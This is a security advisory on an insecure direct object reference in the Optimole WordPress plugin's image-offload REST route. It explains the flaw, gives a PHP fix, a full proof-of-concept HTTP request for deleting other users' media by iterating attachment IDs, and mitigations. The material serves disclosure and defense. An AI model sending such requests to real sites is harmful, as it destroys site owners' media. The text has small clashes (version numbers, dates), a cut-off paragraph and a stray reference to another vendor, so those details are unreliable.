Optimole (WP plugin, ~200k+ installs) optimizes images on the fly and can offload media to a CDN, replacing local files with remote versions to reduce bandwidth and storage. In Optimole WP 4.0.4 we identified CVE-2025-11519, an Insecure Direct Object Reference (IDOR) on the REST route /wp-json/optml/v1/move_image. Any authenticated user possessing the upload_files capability (e.g., Author) and a valid REST nonce can post arbitrary attachment IDs to trigger the offload flow, which deletes the local image and its generated variants after a CDN check. By iterating IDs (e.g., 1..9999), an attacker can mass-process the library and cause site-wide “missing image” failures, broken posts/pages, SEO degradation, and data loss that requires restoring from backups. Because this does not require admin privileges and can be fully automated, the severity is High.
| Field | Value |
|---|---|
| CVE | CVE-2025-11519 |
| Plugin version | Image optimization service by Optimole <= 4.1.0 |
| Severity | High |
| All-time downloads | 7 270 971 |
| Active installations | 200 000+ |
| Publicly published | October 9, 2025 |
| Last updated | October 9, 2025 |
| Researcher | Dmitrii Ignatyev |
| PoC | Yes |
| Exploit | No |
| References | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-11519 ; https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/optimole-wp/image-optimization-service-by-optimole-410-insecure-direct-object-reference-to-authenticated-author-media-offload |
Timeline
| Date | Event |
|---|---|
| October 1, 2025 | Plugin testing and vulnerability detection in Optimole – Optimize Images \| Convert WebP & AVIF \| CDN & Lazy Load \| Image Optimization completed |
| October 1, 2025 | I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing |
| October 17, 2025 | Registered CVE-2025-11519 |
Discovery of the Vulnerability
While auditing Optimole’s media offload mechanism, we found that the handler behind /optml/v1/move_image trusts the id in the request body and performs only a general gate (a valid REST nonce issued by the admin UI plus the upload_files capability); it never checks whether the caller owns the attachment or is otherwise permitted to operate on it. In practice, an Author+ can send
Understanding IDOR attacks
IDOR (CWE-639) arises when a server accepts an object identifier (here, an attachment post ID) without verifying the caller’s right to act on that object. In WordPress, object-level authorization should pair a general capability (e.g., “can upload files?”) with a per-object check such as `current_user_can( 'edit_post', $attachment_id )` (or stricter, e.g. `delete_post` when the action destroys data). Common failures include allowing Editors/Authors to update or delete attachments they don’t own, or to operate on any post by numeric ID. Similar flaws have caused mass deletion, metadata tampering, and privacy leaks across numerous plugins. In Optimole’s case, the impact is amplified because offload also removes local copies, making the IDOR not just a permission bypass but a destructive action that directly affects the availability and integrity of site media.
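To make the difference between a general capability check and object-level authorization concrete, here is an added example (not Optimole's code, and not CleanTalk's): a hypothetical REST route with the same request shape as `/optml/v1/move_image`, registered once with an IDOR-prone `permission_callback` and once with a hardened one. The namespace `example/v1`, the function names and the handler body are assumptions; the WordPress APIs (`register_rest_route`, `current_user_can`, `get_post`, `WP_Error`) are real.

```php
<?php
/**
 * Added illustration, not Optimole's code: a hypothetical offload endpoint
 * shown with the IDOR-prone authorization (general capability only) and with
 * object-level authorization. Route, callback and handler names are assumptions.
 */

// BEFORE: answers only "may this user upload files?" and says nothing about the
// specific attachment named in the body. Any Author can submit any ID.
function example_vulnerable_offload_permission( WP_REST_Request $request ) {
    return current_user_can( 'upload_files' );
}

// AFTER: the general capability AND a per-object check on the ID actually sent.
// Offloading deletes the local file, so the relevant meta capability is
// delete_post on that attachment; WordPress maps it to delete_posts or
// delete_others_posts depending on who owns the attachment.
function example_hardened_offload_permission( WP_REST_Request $request ) {
    if ( ! current_user_can( 'upload_files' ) ) {
        return new WP_Error( 'rest_forbidden', 'Insufficient capability.', array( 'status' => 403 ) );
    }

    $attachment_id = absint( $request->get_param( 'id' ) );
    $attachment    = get_post( $attachment_id );

    // Reject IDs that are not attachments (posts, pages, revisions, nonexistent).
    if ( ! $attachment || 'attachment' !== $attachment->post_type ) {
        return new WP_Error( 'rest_invalid_attachment', 'Not an attachment.', array( 'status' => 404 ) );
    }

    // Object-level authorization: the caller must be allowed to delete *this*
    // attachment. An Author who does not own it is refused here.
    if ( ! current_user_can( 'delete_post', $attachment_id ) ) {
        return new WP_Error( 'rest_forbidden', 'You cannot offload this attachment.', array( 'status' => 403 ) );
    }

    return true;
}

function example_offload_handler( WP_REST_Request $request ) {
    // The CDN check and local-file removal would run here; this stub only echoes the ID.
    return rest_ensure_response( array(
        'id'     => absint( $request->get_param( 'id' ) ),
        'status' => 'queued',
    ) );
}

add_action( 'rest_api_init', function () {
    register_rest_route( 'example/v1', '/move_image', array(
        'methods'             => WP_REST_Server::CREATABLE,
        'callback'            => 'example_offload_handler',
        // Swap in example_vulnerable_offload_permission to reproduce the IDOR.
        'permission_callback' => 'example_hardened_offload_permission',
        'args'                => array(
            'id'     => array(
                'required'          => true,
                'type'              => 'integer',
                'sanitize_callback' => 'absint',
                'validate_callback' => function ( $value ) {
                    return is_numeric( $value ) && (int) $value > 0;
                },
            ),
            'action' => array( 'required' => true, 'type' => 'string' ),
            'status' => array( 'required' => true, 'type' => 'string' ),
        ),
    ) );
} );
```

Note that the `X-WP-Nonce` header is validated by WordPress core's cookie authentication before either `permission_callback` runs; it proves the request originated from a logged-in admin page, not that the user may act on the attachment named in the body. Only the per-object `current_user_can( 'delete_post', $attachment_id )` call closes the IDOR.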
Exploiting the IDOR Vulnerability
To exploit CVE-2025-11519, an attacker with an Author+ session cookie and a valid REST nonce (taken from any wp-admin page, e.g. post-new.php) sends the request below, varying `id` to walk the attachment table:
POC:
```http
POST /wordpress/index.php/wp-json/optml/v1/move_image HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: application/json, */*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://127.0.0.1/wordpress/wp-admin/post-new.php
X-WP-Nonce: nonce_of_rest_from_post.php
Connection: keep-alive
Cookie: cookie_of_author+
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=4
Content-Type: application/json
Content-Length: 52

{"id":138,"action":"offload_image","status":"start"}
```
Impact:
- Site-wide media DoS: Posts, pages, and products lose images (thumbnails, hero images, galleries). UX tanks; support volume spikes.
- SEO degradation: Missing images reduce page quality signals, trigger broken-image warnings, and harm rankings and CTR.
- Data loss & recovery costs: Restoring at scale from backups is time-consuming; if backups are partial or old, loss may be permanent.
- Editorial disruption: Newsrooms and eCommerce catalogs lose visual assets mid-campaign, affecting revenue and reputation.
- Insider abuse: A disgruntled author can mass-offload and delete local copies without admin approval.
Recommendations for Improved Security
- State validation & dry-run: Before deletion, verify rewrite/CDN is active and the remote object is available; introduce a dry-run or staging flag and explicit admin confirmation for bulk operations.
- Least destructive defaults: Prefer copy-then-swap with a rollback grace period; don’t remove local copies until a stable remote mapping is proven and persisted.
- Rate-limit & log: Throttle repeated offloads per user; log user ID, attachment ID, and outcome; emit admin notices for bulk activity.
- UI/REST parity: Match REST permissions to the UI’s intent—only expose offload for attachments visible/editable by the caller.
For site owners
- Update ASAP to a patched release once available.
- Restrict roles: Limit `upload_files` and reduce Author counts; consider elevating offload to Editor/Admin only via a temporary policy.
- Backups & immutability: Ensure frequent, off-site backups of `wp-content/uploads/`; consider immutable storage or object-level versioning.
- Monitor anomalies: Alert on spikes of `move_image` calls, large attachment churn, or sudden CDN/offload state changes.
- Temporary mitigations: Use a WAF rule to challenge/deny `POST /optml/v1/move_image` from non-admin roles; if possible, gate the route behind server-side role checks until patched.
By taking proactive measures to address IDOR vulnerabilities like CVE-2025-11519, WordPress website owners can enhance their security posture and safeguard against potential exploitation. Stay vigilant, stay secure.
Dmitrii I.
